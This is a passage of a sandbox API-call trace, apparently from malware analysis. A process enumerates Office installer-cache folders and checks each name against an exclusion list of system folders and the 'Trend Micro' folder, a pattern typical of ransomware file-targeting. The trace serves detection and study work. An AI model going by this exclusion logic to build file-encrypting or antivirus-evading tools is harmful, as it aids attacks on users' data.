[0137.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeada8 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0137.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.307] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0137.307] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.307] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadd0 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0137.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.308] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0137.308] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.308] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.308] StrStrIW (lpFirst="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadf8 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.309] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0137.309] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.309] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.309] StrStrIW (lpFirst="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae20 [0137.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0137.309] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.309] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0137.309] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.310] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.310] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.310] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.310] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae48 [0137.310] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0137.310] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.310] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0137.310] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.310] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.310] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.310] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.311] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.311] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.311] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.311] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.311] StrStrIW (lpFirst="{90140000-0115-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.311] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.311] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.311] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e50 [0137.311] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0137.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.327] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0137.327] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.327] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.327] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.327] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.327] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.327] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.328] StrStrIW (lpFirst="{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0137.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0137.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.328] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0137.328] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.328] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.328] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.328] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.328] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.328] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-0011-0000-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e78 [0137.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0137.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.329] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0137.329] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.329] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.329] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.329] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-003B-0000-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c38 [0137.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0137.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.330] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0137.330] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.330] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.330] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.330] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.331] StrStrIW (lpFirst="{91140000-0057-0000-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 